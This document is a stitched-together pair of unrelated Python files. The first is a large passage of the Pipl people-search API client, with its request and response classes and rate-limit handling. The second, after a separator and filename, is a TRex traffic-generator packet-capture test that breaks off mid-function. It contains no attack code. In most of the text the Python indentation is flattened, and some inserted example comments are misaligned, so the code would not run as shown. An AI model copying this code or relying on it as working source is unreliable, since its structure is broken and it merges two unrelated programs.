example, when there are multiple parameters of the same type
such as few phones or a few addresses or when you'd like to use
information beyond the usual identifiers such as name or email,
information like education, job, relationships etc):
>>> from piplapis.search import SearchAPIRequest
>>> from piplapis.data import Person, Name, Address, Job
>>> fields = [Name(first='Clark', last='Kent'),
>>> Address(country='US', state='KS', city='Smallville'),
>>> Address(country='US', state='KS', city='Metropolis'),
>>> Job(title='Field Reporter')]
>>> request = SearchAPIRequest(api_key='samplekey',
>>> person=Person(fields=fields))
>>> response = request.send()
Sending the request and getting the response is very simple and can be done
by either making a blocking call to request.send() or by making
a non-blocking call to request.send_async(callback) which sends the request
asynchronously.
You can also set various request flags:
minimum_probability - a float between 0 and 1, to define what statistical confidence you need for inferred data.
show_sources - string, either "all", "matching" or True. If not set, no sources will be shown.
"all" - all sources will be shown.
"matching" - only sources belonging to a matching person will be shown.
Boolean True will behave like "matching".
hide_sponsored - boolean (default False), whether to hide sponsored results.
infer_persons - boolean (default False), whether the API should return person responses made up solely from data inferred by statistical analysis.
    minimum_match - a float between 0 and 1, to define the minimum match under which possible persons (responses
                    that may be the person you're looking for) will not be returned.
live_feeds - boolean (default True), whether to use live data feeds. Can be turned off
for performance.
"""
HEADERS = {'User-Agent': 'piplapis/python/%s' % piplapis.__version__}
BASE_URL = '{}://api.pipl.com/search/?'
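    # Illustrative example of the request flags described in the class docstring above
    # (assumes a valid API key):
    #
    #     request = SearchAPIRequest(api_key='samplekey', email='clark.kent@example.com',
    #                                minimum_match=0.7, show_sources='matching',
    #                                hide_sponsored=True, live_feeds=False)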
# The following are default settings for all request objects
# You can set them once instead of passing them to the constructor every time
default_api_key = 'sample_key'
default_use_https = False
default_minimum_probability = None
default_show_sources = None
default_minimum_match = None
default_hide_sponsored = None
default_live_feeds = None
default_infer_persons = None
default_match_requirements = None
default_source_category_requirements = None
default_response_class = None
@classmethod
def set_default_settings(cls, api_key=None, minimum_probability=None, show_sources=None,
minimum_match=None, hide_sponsored=None, live_feeds=None, use_https=False,
match_requirements=None, source_category_requirements=None, infer_persons=None,
response_class=None):
cls.default_api_key = api_key
cls.default_minimum_probability = minimum_probability
cls.default_show_sources = show_sources
cls.default_minimum_match = minimum_match
cls.default_hide_sponsored = hide_sponsored
cls.default_live_feeds = live_feeds
cls.default_use_https = use_https
cls.default_match_requirements = match_requirements
cls.default_source_category_requirements = source_category_requirements
cls.default_infer_persons = infer_persons
cls.default_response_class = response_class
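    # For example (sketch): set the defaults once per process, then build requests without
    # repeating them:
    #
    #     SearchAPIRequest.set_default_settings(api_key='samplekey', use_https=True)
    #     request = SearchAPIRequest(email='clark.kent@example.com')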
def __init__(self, api_key=None, first_name=None, middle_name=None,
last_name=None, raw_name=None, email=None, phone=None, country_code=None,
raw_phone=None, username=None, country=None, state=None, city=None,
raw_address=None, from_age=None, to_age=None, person=None,
search_pointer=None, minimum_probability=None, show_sources=None,
minimum_match=None, hide_sponsored=None, live_feeds=None, use_https=None,
match_requirements=None, source_category_requirements=None, infer_persons=None,
response_class=None):
"""Initiate a new request object with given query params.
Each request must have at least one searchable parameter, meaning
a name (at least first and last name), email, phone or username.
Multiple query params are possible (for example querying by both email
and phone of the person).
Args:
:param api_key: str, a valid API key (use "samplekey" for experimenting).
Note that you can set a default API key
(piplapis.search.default_api_key = '<your_key>') instead of
passing it to each request object.
:param first_name: unicode, minimum 2 chars.
:param middle_name: unicode.
:param last_name: unicode, minimum 2 chars.
:param raw_name: unicode, an unparsed name containing at least a first name
and a last name.
:param email: unicode.
:param phone: int/long. A national phone with no formatting.
:param country_code: int. The phone country code
:param raw_phone: string. A phone to be sent as-is, will be parsed by Pipl.
:param username: unicode, minimum 4 chars.
:param country: unicode, a 2 letter country code from:
http://en.wikipedia.org/wiki/ISO_3166-2
:param state: unicode, a state code from:
http://en.wikipedia.org/wiki/ISO_3166-2%3AUS
http://en.wikipedia.org/wiki/ISO_3166-2%3ACA
:param city: unicode.
:param raw_address: unicode, an unparsed address.
:param from_age: int.
:param to_age: int.
:param person: A Person object (available at piplapis.data.Person).
The person can contain every field allowed by the data-model
(see piplapis.data.fields) and can hold multiple fields of
the same type (for example: two emails, three addresses etc.)
:param search_pointer: str, sending a search pointer of a possible person will retrieve
more data related to this person.
:param minimum_probability: float (0-1). The minimum required confidence for inferred data.
:param show_sources: str or bool, one of "matching"/"all". "all" will show all sources, "matching"
only those of the matching person. Boolean True will behave like "matching".
:param minimum_match: float (0-1). The minimum required match under which possible persons will not be returned.
:param live_feeds: bool, default True. Whether to use live feeds. Only relevant in plans that include
live feeds. Can be set to False for performance.
:param hide_sponsored: bool, default False. Whether to hide sponsored results.
:param infer_persons: bool, default False. Whether the API should return person responses made up solely from data inferred by statistical analysis.
:param use_https: bool, default False. Whether to use an encrypted connection.
:param match_requirements: str/unicode, a match requirements criteria. This criteria defines what fields
must be present in an API response in order for it to be returned as a match.
For example: "email" or "email or phone", or "email or (phone and name)"
:param source_category_requirements: str/unicode, a source category requirements criteria. This criteria defines
what source categories must be present in an API response in order for it to be
returned as a match. For example: "personal_profiles" or "personal_profiles or professional_and_business"
:param response_class: object, an object inheriting SearchAPIResponse and adding functionality beyond the basic
response scope. This provides the option to override methods or just add them.
Each of the arguments that should have a unicode value accepts both
unicode objects and utf8 encoded str (will be decoded automatically).
"""
if person is None:
person = Person()
if first_name or middle_name or last_name:
name = Name(first=first_name, middle=middle_name, last=last_name)
person.add_fields([name])
if raw_name:
person.add_fields([Name(raw=raw_name)])
if email:
person.add_fields([Email(address=email)])
if phone or raw_phone:
person.add_fields([Phone(country_code=country_code, number=phone, raw=raw_phone)])
if username:
person.add_fields([Username(content=username)])
if country or state or city:
address = Address(country=country, state=state, city=city)
person.add_fields([address])
if raw_address:
person.add_fields([Address(raw=raw_address)])
if from_age is not None or to_age is not None:
dob = DOB.from_age_range(from_age or 0, to_age or 1000)
person.add_fields([dob])
person.search_pointer = search_pointer
self.person = person
self.api_key = api_key or self.default_api_key
self.show_sources = show_sources if show_sources is not None else self.default_show_sources
self.live_feeds = live_feeds if live_feeds is not None else self.default_live_feeds
self.minimum_match = minimum_match or self.default_minimum_match
self.minimum_probability = minimum_probability or self.default_minimum_probability
self.hide_sponsored = hide_sponsored if hide_sponsored is not None else self.default_hide_sponsored
self.match_requirements = match_requirements or self.default_match_requirements
self.source_category_requirements = source_category_requirements or self.default_source_category_requirements
self.use_https = use_https if use_https is not None else self.default_use_https
self.infer_persons = infer_persons if infer_persons is not None else self.default_infer_persons
response_class = response_class or self.default_response_class
self.response_class = response_class if response_class and issubclass(response_class, SearchAPIResponse) \
else SearchAPIResponse
def validate_query_params(self, strict=True):
"""Check if the request is valid and can be sent, raise ValueError if
not.
:param strict: bool. If True, an exception is raised for every
invalid query parameter; if False, an exception is raised only when the search
request cannot be performed because required query params are missing.
"""
if not self.api_key:
raise ValueError('API key is missing')
if strict:
if self.minimum_match and (type(self.minimum_match) is not float or
self.minimum_match > 1 or self.minimum_match < 0):
raise ValueError('minimum_match should be a float between 0 and 1')
if self.hide_sponsored is not None and type(self.hide_sponsored) is not bool:
raise ValueError('hide_sponsored should be a boolean')
if self.infer_persons is not None and type(self.infer_persons) is not bool:
raise ValueError('infer_persons should be a boolean')
if self.live_feeds is not None and type(self.live_feeds) is not bool:
raise ValueError('live_feeds should be a boolean')
if self.match_requirements is not None and not isinstance(self.match_requirements, string_types):
raise ValueError('match_requirements should be an str or unicode object')
if self.source_category_requirements is not None and not isinstance(self.source_category_requirements,
string_types):
raise ValueError('source_category_requirements should be an str or unicode object')
if self.show_sources not in ("all", "matching", "false", "true", True, False, None):
raise ValueError('show_sources has a wrong value. Should be "matching", "all", True, False or None')
if self.minimum_probability and (type(self.minimum_probability) is not float or
self.minimum_probability > 1 or self.minimum_probability < 0):
raise ValueError('minimum_probability should be a float between 0 and 1')
if self.person.unsearchable_fields:
raise ValueError('Some fields are unsearchable: %s' % self.person.unsearchable_fields)
if not self.person.is_searchable:
raise ValueError('No valid name/username/user_id/phone/email/address or search pointer in request')
@property
def url(self):
"""The URL of the request (str)."""
query = self.get_search_query()
return self.get_base_url() + urlencode(query, doseq=True)
def get_search_query(self):
query = {"key": self.api_key}
if self.person and self.person.search_pointer:
query['search_pointer'] = self.person.search_pointer
elif self.person:
query['person'] = self.person.to_json()
if self.minimum_probability is not None:
query['minimum_probability'] = self.minimum_probability
if self.minimum_match is not None:
query['minimum_match'] = self.minimum_match
if self.hide_sponsored is not None:
query['hide_sponsored'] = self.hide_sponsored
if self.infer_persons is not None:
query['infer_persons'] = self.infer_persons
if self.match_requirements is not None:
query['match_requirements'] = self.match_requirements
if self.source_category_requirements is not None:
query['source_category_requirements'] = self.source_category_requirements
if self.live_feeds is not None:
query['live_feeds'] = self.live_feeds
if self.show_sources is not None:
query['show_sources'] = self.show_sources
return query
def send(self, strict_validation=True):
"""Send the request and return the response or raise SearchAPIError.
Calling this method blocks the program until the response is returned;
if you want the request to be sent asynchronously please refer to the
send_async method.
The response is returned as a SearchAPIResponse object.
:param strict_validation: bool. Used by self.validate_query_params.
:raises ValueError (raised from validate_query_params),
httpError/URLError and SearchAPIError (when the response is returned
but contains an error).
example:
>>> from piplapis.search import SearchAPIRequest, SearchAPIError
>>> request = SearchAPIRequest('samplekey', email='clark.kent@example.com')
>>> try:
... response = request.send()
... except SearchAPIError as e:
... print(e.http_status_code, e)
:return: A Response from the API
:rtype: SearchAPIResponse
"""
self.validate_query_params(strict=strict_validation)
query = self.get_search_query()
request = urllib2.Request(url=self.get_base_url(), data=urlencode(query, True).encode(),
headers=SearchAPIRequest.HEADERS)
try:
response = urllib2.urlopen(request)
json_response = response.read().decode()
search_response = self.response_class.from_json(json_response)
search_response._add_rate_limiting_headers(*self._get_quota_and_throttle_data(response.headers))
return search_response
except urllib2.HTTPError as e:
json_error = e.read()
if not json_error:
raise e
try:
exception = SearchAPIError.from_json(json_error.decode())
exception._add_rate_limiting_headers(*self._get_quota_and_throttle_data(e.headers))
raise exception
except ValueError:
raise e
@staticmethod
def _get_quota_and_throttle_data(headers):
# Set default values
(quota_allotted, quota_current, quota_reset, qps_allotted, qps_current, qps_live_allotted, qps_live_current,
qps_demo_allotted, qps_demo_current, demo_usage_allotted, demo_usage_current, demo_usage_expiry) = (None,) * 12
time_format = "%A, %B %d, %Y %I:%M:%S %p %Z"
# Handle quota headers
if 'X-APIKey-Quota-Allotted' in headers:
quota_allotted = int(headers.get('X-APIKey-Quota-Allotted'))
if 'X-APIKey-Quota-Current' in headers:
quota_current = int(headers.get('X-APIKey-Quota-Current'))
if 'X-Quota-Reset' in headers:
datetime_str = headers.get('X-Quota-Reset')
quota_reset = datetime.datetime.strptime(datetime_str, time_format).replace(tzinfo=pytz.utc)
# Handle throttling
if 'X-QPS-Allotted' in headers:
qps_allotted = int(headers.get('X-QPS-Allotted'))
if 'X-QPS-Current' in headers:
qps_current = int(headers.get('X-QPS-Current'))
if 'X-QPS-Live-Allotted' in headers:
qps_live_allotted = int(headers.get('X-QPS-Live-Allotted'))
if 'X-QPS-Live-Current' in headers:
qps_live_current = int(headers.get('X-QPS-Live-Current'))
if 'X-QPS-Demo-Allotted' in headers:
qps_demo_allotted = int(headers.get('X-QPS-Demo-Allotted'))
if 'X-QPS-Demo-Current' in headers:
qps_demo_current = int(headers.get('X-QPS-Demo-Current'))
# Handle Demo usage allowance
if 'X-Demo-Usage-Allotted' in headers:
demo_usage_allotted = int(headers.get('X-Demo-Usage-Allotted'))
if 'X-Demo-Usage-Current' in headers:
demo_usage_current = int(headers.get('X-Demo-Usage-Current'))
if 'X-Demo-Usage-Expiry' in headers:
datetime_str = headers.get('X-Demo-Usage-Expiry')
demo_usage_expiry = datetime.datetime.strptime(datetime_str, time_format).replace(tzinfo=pytz.utc)
return (quota_allotted, quota_current, quota_reset, qps_allotted, qps_current, qps_live_allotted,
qps_live_current, qps_demo_allotted, qps_demo_current, demo_usage_allotted,
demo_usage_current, demo_usage_expiry)
def send_async(self, callback, strict_validation=True):
"""Same as send() but in a non-blocking way.
Use this method if you want to send the request asynchronously so your
program can do other things while waiting for the response.
:param strict_validation: bool. Used by self.validate_query_params.
:param callback: Callable with the following signature - callback(response=None, error=None).
example:
>>> from piplapis.search import SearchAPIRequest
>>>
>>> def my_callback(response=None, error=None):
... print(response or error)
...
>>> request = SearchAPIRequest('samplekey', email='clark.kent@example.com')
>>> request.send_async(my_callback)
>>> do_other_things()
"""
def target():
try:
response = self.send(strict_validation)
callback(response=response)
except Exception as e:
callback(error=e)
threading.Thread(target=target).start()
def get_base_url(self):
protocol = "https" if self.use_https or (self.use_https is None and self.default_use_https) else "http"
return self.BASE_URL.format(protocol)
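# Usage sketch (added for illustration, not part of the library): the class-level
# defaults above can be set once so that later SearchAPIRequest constructions pick
# them up automatically. The key and threshold values below are placeholders.
#
#     SearchAPIRequest.set_default_settings(api_key='samplekey', use_https=True,
#                                           minimum_match=0.5, show_sources='matching')
#     request = SearchAPIRequest(email='clark.kent@example.com')
#     response = request.send()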
class SearchAPIResponse(Serializable):
"""a response from Pipl's Search API.
a response contains 4 main data elements:
- available data summary (piplapis.data.available_data.AvailableData).
This is a summary of the data available for your search. Please note that
some available data may not be present in the response due to data package limits.
The available data contains two sub-elements, basic and premium (if you're on premium,
basic will be None):
- basic: shows the data available with a basic coverage plan
- premium: shows the data available with a premium coverage plan
- a person (piplapis.data.containers.Person) that is the data object
representing all the information available for the person you were
looking for.
this object will only be returned when our identity-resolution engine is
convinced that the information is of the person represented by your query.
obviously, if the query was for "John Smith" there's no way for our
identity-resolution engine to know which of the hundreds of thousands of
people named John Smith you were referring to, therefore you can expect
that the response will not contain a person object.
on the other hand, if you search by a unique identifier such as email or
a combination of identifiers that only lead to one person, such as
"Clark Kent from Smallville, KS, US", you can expect to get
a response containing a single person object.
- a list of possible persons (piplapis.data.containers.Person). If our identity-resolution
engine did not find a definite match, you can use this list to further
drill down using the persons' search_pointer field.
- a list of sources (piplapis.data.containers.Source). Sources are the breakdown
of a response's data into its origin - so each source will contain data that came
from one source (e.g. a facebook profile, a public record, etc).
Sources may contain strictly data that belongs to the person returned as a
perfect match (only these are shown if the search contained show_sources=matching),
or they may belong to possibly related people. In any case, by default API
responses do not contain sources, and to use them you must pass a value for show_sources.
The response also contains the query as it was interpreted by Pipl. This
part is useful for verification and debugging: if some query parameters
were invalid you can see in response.query that they were ignored, and you can
also see how the name/address from your query were parsed in case you
passed raw_name/raw_address in the query.
"""
def __init__(self, query=None, person=None, sources=None,
possible_persons=None, warnings_=None, http_status_code=None,
visible_sources=None, available_sources=None, search_id=None,
match_requirements=None, available_data=None, source_category_requirements=None,
persons_count=None, *args, **kwargs):
"""
:param query: A Person object with the query as interpreted by Pipl.
:param person: A Person object with data about the person in the query.
:param sources: A list of Source objects with full/partial match to the query.
:param possible_persons: A list of Person objects, each of these is an
expansion of the original query, giving additional
query parameters to zoom in on the right person.
:param warnings_: A list of unicodes. A warning is returned when the query
contains a non-critical error and the search can still run.
:param visible_sources: int, the number of sources in response
:param available_sources: int, the total number of known sources for this search
:param search_id: str or unicode, a unique ID which identifies this search. Useful for debugging.
:param available_data: an AvailableData object, showing the data available for your query.
:param match_requirements: str or unicode. Shows how Pipl interpreted your match_requirements criteria.
:param source_category_requirements: str or unicode. Shows how Pipl interpreted your
source_category_requirements criteria.
:param persons_count: int. The number of persons in this response.
"""
self.query = query
self.person = person
self.sources = sources or []
self.possible_persons = possible_persons or []
self.warnings = warnings_ or []
self.http_status_code = http_status_code
self.visible_sources = visible_sources
self.available_sources = available_sources
self.search_id = search_id
self.available_data = available_data
self.match_requirements = match_requirements
self.source_category_requirements = source_category_requirements
self.persons_count = persons_count
if not self.persons_count:
self.persons_count = 1 if self.person is not None else len(self.possible_persons)
self.raw_json = None
# Rate limiting data
self.qps_allotted = None # Your permitted queries per second
self.qps_current = None # The number of queries that you've run in the same second as this one.
self.qps_live_allotted = None # Your permitted live queries per second
self.qps_live_current = None # The number of live queries that you've run in the same second as this one.
self.qps_demo_allotted = None # Your permitted demo queries per second
self.qps_demo_current = None # The number of demo queries that you've run in the same second as this one.
self.quota_allotted = None # Your API quota
self.quota_current = None # The API quota used so far
self.quota_reset = None # The time when your quota resets
self.demo_usage_allotted = None # Your permitted demo queries
self.demo_usage_current = None # The number of demo queries that you've already run
self.demo_usage_expiry = None # The expiry time of your demo usage
@property
def matching_sources(self):
"""Sources that match the person from the query.
Note that the meaning of "match the person from the query" means "Pipl
is convinced that these sources hold data about the person you're
looking for".
Essentially, these are the sources that make up the Person object.
"""
return [source for source in self.sources if source.match == 1.]
def group_sources(self, key_function):
"""Return a dict with the sources grouped by the key returned by
`key_function`.
:param key_function: function, takes a source and returns the value from the source to
group by (see examples in the group_sources_by_* methods below).
:return dict, a key in this dict is a key returned by
`key_function` and the value is a list of all the sources with this key.
"""
sorted_sources = sorted(self.sources, key=key_function)
grouped_sources = itertools.groupby(sorted_sources, key=key_function)
return dict([(key, list(group)) for key, group in grouped_sources])
def group_sources_by_domain(self):
"""Return the sources grouped by the domain they came from.
:return dict, a key in this dict is a domain
and the value is a list of all the sources with this domain.
"""
key_function = lambda source: source.domain
return self.group_sources(key_function)
def group_sources_by_category(self):
"""Return the sources grouped by their category.
:return dict, a key in this dict is a category
and the value is a list of all the sources with this category.
"""
key_function = lambda source: source.category
return self.group_sources(key_function)
def group_sources_by_match(self):
"""Return the sources grouped by their match attribute.
:return dict, a key in this dict is a match
float and the value is a list of all the sources with this
match value.
"""
key_function = lambda source: source.match
return self.group_sources(key_function)
@classmethod
def from_json(cls, json_str):
"""
We override this method in SearchAPIResponse so that the raw JSON string
is kept on the returned object (in its raw_json attribute).
:param json_str: the raw JSON response string.
:return: a SearchAPIResponse (or subclass) instance.
"""
d = json.loads(json_str)
obj = cls.from_dict(d)
obj.raw_json = json_str
return obj
@classmethod
def from_dict(cls, d):
"""Transform the dict to a response object and return the response.
:param d: the API response dictionary
"""
http_status_code = d.get('@http_status_code')
visible_sources = d.get('@visible_sources')
available_sources = d.get('@available_sources')
warnings_ = d.get('warnings', [])
search_id = d.get('@search_id')
persons_count = d.get('@persons_count')
match_requirements = d.get('match_requirements')
source_category_requirements = d.get('source_category_requirements')
available_data = d.get('available_data') or None
if available_data is not None:
available_data = AvailableData.from_dict(available_data)
query = d.get('query') or None
if query is not None:
query = Person.from_dict(query)
person = d.get('person') or None
if person is not None:
person = Person.from_dict(person)
sources = d.get('sources')
if sources:
sources = [Source.from_dict(source) for source in sources]
possible_persons = [Person.from_dict(x) for x in d.get('possible_persons', [])]
return cls(query=query, person=person, sources=sources,
possible_persons=possible_persons, warnings_=warnings_,
http_status_code=http_status_code, visible_sources=visible_sources,
available_sources=available_sources, search_id=search_id,
match_requirements=match_requirements, available_data=available_data,
source_category_requirements=source_category_requirements,
persons_count=persons_count)
def to_dict(self):
"""Return a dict representation of the response."""
d = {}
if self.http_status_code:
d['@http_status_code'] = self.http_status_code
if self.visible_sources:
d['@visible_sources'] = self.visible_sources
if self.available_sources:
d['@available_sources'] = self.available_sources
if self.search_id:
d['@search_id'] = self.search_id
if self.persons_count:
d['@persons_count'] = self.persons_count
if self.warnings:
d['warnings'] = self.warnings
if self.match_requirements:
d['match_requirements'] = self.match_requirements
if self.available_data is not None:
d['available_data'] = self.available_data.to_dict()
if self.query is not None:
d['query'] = self.query.to_dict()
if self.person is not None:
d['person'] = self.person.to_dict()
if self.sources:
d['sources'] = [source.to_dict() for source in self.sources]
if self.possible_persons:
d['possible_persons'] = [person.to_dict() for person in self.possible_persons]
return d
@property
def gender(self):
"""
A shortcut method to get the result's person's gender.
return Gender
"""
return self.person.gender if self.person else None
@property
def dob(self):
"""
A shortcut method to get the result's person's date of birth.
return DOB
"""
return self.person.dob if self.person else None
@property
def job(self):
"""
A shortcut method to get the result's person's job.
return Job
"""
return self.person.jobs[0] if self.person and len(self.person.jobs) > 0 else None
@property
def address(self):
"""
A shortcut method to get the result's person's address.
return Address
"""
return self.person.addresses[0] if self.person and len(self.person.addresses) > 0 else None
@property
def education(self):
"""
A shortcut method to get the result's person's education.
return Education
"""
return self.person.educations[0] if self.person and len(self.person.educations) > 0 else None
@property
def language(self):
"""
A shortcut method to get the result's person's spoken language.
return Language
"""
return self.person.languages[0] if self.person and len(self.person.languages) > 0 else None
@property
def ethnicity(self):
"""
A shortcut method to get the result's person's ethnicity.
return Ethnicity
"""
return self.person.ethnicities[0] if self.person and len(self.person.ethnicities) > 0 else None
@property
def origin_country(self):
"""
A shortcut method to get the result's person's origin country.
return OriginCountry
"""
return self.person.origin_countries[0] if self.person and len(self.person.origin_countries) > 0 else None
@property
def phone(self):
"""
A shortcut method to get the result's person's phone.
return Phone
"""
return self.person.phones[0] if self.person and len(self.person.phones) > 0 else None
@property
def email(self):
"""
A shortcut method to get the result's person's email.
return Email
"""
return self.person.emails[0] if self.person and len(self.person.emails) > 0 else None
@property
def name(self):
"""
A shortcut method to get the result's person's name.
return Name
"""
return self.person.names[0] if self.person and len(self.person.names) > 0 else None
@property
def image(self):
"""
A shortcut method to get the result's person's image.
return Image
"""
return self.person.images[0] if self.person and len(self.person.images) > 0 else None
@property
def url(self):
"""
A shortcut method to get the result's person's url.
return URL
"""
return self.person.urls[0] if self.person and len(self.person.urls) > 0 else None
@property
def username(self):
"""
A shortcut method to get the result's person's username.
return Username
"""
return self.person.usernames[0] if self.person and len(self.person.usernames) > 0 else None
@property
def user_id(self):
"""
A shortcut method to get the result's person's user_id.
return UserID
"""
return self.person.user_ids[0] if self.person and len(self.person.user_ids) > 0 else None
@property
def relationship(self):
"""
A shortcut method to get the result's person's most prominent relationship.
return Relationship
"""
return self.person.relationships[0] if self.person and len(self.person.relationships) > 0 else None
def add_quota_throttle_data(self, *args, **kwargs):
logger.warn("SearchAPIResponse.add_quota_throttle_data is deprecated")
return self._add_rate_limiting_headers(*args, **kwargs)
def _add_rate_limiting_headers(self, quota_allotted=None, quota_current=None, quota_reset=None, qps_allotted=None,
qps_current=None, qps_live_allotted=None, qps_live_current=None, qps_demo_allotted=None,
qps_demo_current=None, demo_usage_allotted=None, demo_usage_current=None,
demo_usage_expiry=None):
self.qps_allotted = qps_allotted
self.qps_current = qps_current
self.qps_live_allotted = qps_live_allotted
self.qps_live_current = qps_live_current
self.qps_demo_allotted = qps_demo_allotted
self.qps_demo_current = qps_demo_current
self.quota_allotted = quota_allotted
self.quota_current = quota_current
self.quota_reset = quota_reset
self.demo_usage_allotted = demo_usage_allotted
self.demo_usage_current = demo_usage_current
self.demo_usage_expiry = demo_usage_expiry
class SearchAPIError(APIError):
"""an exception raised when the response from the search API contains an
error."""
pass
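# ---------------------------------------------------------------------------
# End-to-end usage sketch (added for illustration; the API key, email and the
# printed fields are placeholders). It exercises only calls defined above:
# send(), SearchAPIError handling, the person/possible_persons elements and
# source grouping.
if __name__ == '__main__':
    request = SearchAPIRequest(api_key='samplekey',
                               email='clark.kent@example.com',
                               show_sources='matching')
    try:
        response = request.send()
    except SearchAPIError as e:
        # The exception carries the HTTP status code returned by the API.
        print('Search failed (%s): %s' % (e.http_status_code, e))
    else:
        if response.person:
            print('Matched person name: %s' % response.name)
            print('Sources by category: %s' % response.group_sources_by_category())
        else:
            # No definite match - each possible person carries a search pointer
            # that can seed a follow-up request.
            for possible in response.possible_persons:
                follow_up = SearchAPIRequest(api_key='samplekey',
                                             search_pointer=possible.search_pointer)
                # follow_up.send() would retrieve the full data for this candidate.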
|
stl_capture_test.py
|
#!/router/bin/python
from .stl_general_test import CStlGeneral_Test, CTRexScenario
from trex_stl_lib.api import *
import os, sys, struct
import pprint
import zmq
import threading
import time
import tempfile
import socket
from scapy.utils import RawPcapReader
from nose.tools import assert_raises, nottest
def ip2num (ip_str):
return struct.unpack('>L', socket.inet_pton(socket.AF_INET, ip_str))[0]
def num2ip (ip_num):
return socket.inet_ntoa(struct.pack('>L', ip_num))
def ip_add (ip_str, cnt):
return num2ip(ip2num(ip_str) + cnt)
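# e.g. ip_add('16.0.0.0', 7) == '16.0.0.7'; used below to predict the source IPs
# produced by the flow-variable VM (which increments ip_src in steps of 7).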
class STLCapture_Test(CStlGeneral_Test):
"""Tests for capture packets"""
def setUp(self):
CStlGeneral_Test.setUp(self)
if not self.is_loopback:
self.skip('capture tests are skipped on a non-loopback machine')
if self.is_linux_stack:
self.skip('capture tests are skipped with linux-based stack')
self.c = CTRexScenario.stl_trex
self.tx_port, self.rx_port = CTRexScenario.ports_map['bi'][0]
self.c.connect()
self.c.reset(ports = [self.tx_port, self.rx_port])
self.pkt = STLPktBuilder(pkt = Ether()/IP(src="16.0.0.1",dst="48.0.0.1")/UDP(dport=12,sport=1025)/IP()/'a_payload_example')
self.percentage = 5 if self.is_virt_nics else 50
# some drivers (enic) might add VLAN always
driver = self.c.any_port.get_formatted_info()['driver']
self.nic_adds_vlan = driver in ['net_enic']
self.hostname = socket.gethostname()
@classmethod
def tearDownClass(cls):
if CTRexScenario.stl_init_error:
return
# connect back at end of tests
if not cls.is_connected():
CTRexScenario.stl_trex.connect()
def correct_bpf(self, bpf):
if self.nic_adds_vlan:
return '{0} or (vlan and {0})'.format(bpf)
return bpf
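# e.g. on a VLAN-adding NIC, correct_bpf('ip and udp') returns
# 'ip and udp or (vlan and ip and udp)', so the filter matches the traffic
# whether or not the driver inserted a VLAN tag.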
def __compare_captures (self, tx_pkt_list, rx_pkt_list):
# make sure we have the same binaries in both lists
tx_pkt_list_bin = {pkt['binary'] for pkt in tx_pkt_list}
rx_pkt_list_bin = {pkt['binary'] for pkt in rx_pkt_list}
if tx_pkt_list_bin != rx_pkt_list_bin:
# if the NIC does not add VLAN - a simple binary compare will do
if not self.nic_adds_vlan:
assert 0, "TX and RX captures do not match"
# the NIC adds VLAN - compare IP level
tx_pkt_list_ip = { bytes((Ether(pkt))['IP']) for pkt in tx_pkt_list_bin}
rx_pkt_list_ip = { bytes((Ether(pkt))['IP']) for pkt in rx_pkt_list_bin}
if tx_pkt_list_ip != rx_pkt_list_ip:
assert 0, "TX and RX captures do not match"
# a simple capture test - inject packets and see the packets arrived the same
def test_basic_capture (self):
pkt_count = 100
try:
# move to service mode
self.c.set_service_mode(ports = [self.tx_port, self.rx_port])
# start a capture
bpf = self.correct_bpf('ip and udp')
txc = self.c.start_capture(tx_ports = self.tx_port, limit = pkt_count, bpf_filter = bpf)
rxc = self.c.start_capture(rx_ports = self.rx_port, limit = pkt_count, bpf_filter = bpf)
# inject few packets with a VM
vm = STLScVmRaw( [STLVmFlowVar ( "ip_src", min_value="16.0.0.0", max_value="16.255.255.255", size=4, step = 7, op = "inc"),
STLVmWrFlowVar (fv_name="ip_src", pkt_offset= "IP.src"),
STLVmFixIpv4(offset = "IP")
]
);
pkt = STLPktBuilder(pkt = Ether()/IP(src="16.0.0.1",dst="48.0.0.1")/UDP(dport=12,sport=1025)/IP()/'a_payload_example',
vm = vm)
stream = STLStream(name = 'burst',
packet = pkt,
mode = STLTXSingleBurst(total_pkts = pkt_count,
percentage = self.percentage)
)
self.c.add_streams(ports = self.tx_port, streams = [stream])
self.c.start(ports = self.tx_port, force = True)
self.c.wait_on_traffic(ports = self.tx_port)
tx_pkt_list = []
self.c.stop_capture(txc['id'], output = tx_pkt_list)
with tempfile.NamedTemporaryFile() as rx_pcap:
with assert_raises(TRexError):
self.c.stop_capture(rxc['id'], output = '/tmp/asdfasdfqwerasdf/azasdfas') # should raise TRexError
self.c.stop_capture(rxc['id'], output = rx_pcap.name)
rx_pkt_list = [{'binary': pkt[0]} for pkt in RawPcapReader(rx_pcap.name)]
assert (len(tx_pkt_list) == len(rx_pkt_list) == pkt_count), 'Not equal: %s %s %s' % (len(tx_pkt_list), len(rx_pkt_list), pkt_count)
# make sure we have the same binaries in both lists
self.__compare_captures(tx_pkt_list, rx_pkt_list)
# generate all the values that should be
expected_src_ips = {ip_add('16.0.0.0', i * 7) for i in range(pkt_count)}
got_src_ips = {(Ether(pkt['binary']))['IP'].src for pkt in rx_pkt_list}
if expected_src_ips != got_src_ips:
assert 0, "recieved packets do not match expected packets"
except STLError as e:
assert False , '{0}'.format(e)
finally:
self.c.remove_all_captures()
self.c.set_service_mode(ports = self.rx_port, enabled = False)
# in this test we apply captures under traffic multiple times
def test_stress_capture (self):
pkts_limit = set([40, 70, 100])
try:
# move to service mode
self.c.set_service_mode(ports = self.rx_port)
# start heavy traffic
pkt = STLPktBuilder(pkt = Ether()/IP(src="16.0.0.1",dst="48.0.0.1")/UDP(dport=12,sport=1025)/IP()/'a_payload_example')
stream = STLStream(name = 'burst',
packet = pkt,
mode = STLTXCont(percentage = self.percentage)
)
self.c.add_streams(ports = self.tx_port, streams = [stream])
self.c.start(ports = self.tx_port, force = True)
captures = [{'capture_id': None, 'limit': pkts} for pkts in pkts_limit]
for i in range(0, 100):
# start a few captures
for capture in captures:
bpf = self.correct_bpf('ip and udp')
res = self.c.start_capture(rx_ports = [self.rx_port], limit = capture['limit'], bpf_filter = bpf)
capture['capture_id'] = res['id']
# a little time to wait for captures to be full
wait_iterations = 0
while True:
server_captures = self.c.get_capture_status()
counts = ([c['count'] for c in server_captures.values()])
if pkts_limit == set(counts):
break
time.sleep(0.1)
wait_iterations += 1
assert(wait_iterations <= 5)
for capture in captures:
capture_id = capture['capture_id']
# make sure the server registers us and we are full
assert(capture['capture_id'] in server_captures.keys())
assert(server_captures[capture_id]['count'] == capture['limit'])
# fetch packets
pkt_list = []
self.c.stop_capture(capture['capture_id'], pkt_list)
assert (len(pkt_list) == capture['limit'])
# a little sanity per packet
for pkt in pkt_list:
scapy_pkt = Ether(pkt['binary'])
assert(scapy_pkt['IP'].src == '16.0.0.1')
assert(scapy_pkt['IP'].dst == '48.0.0.1')
except STLError as e:
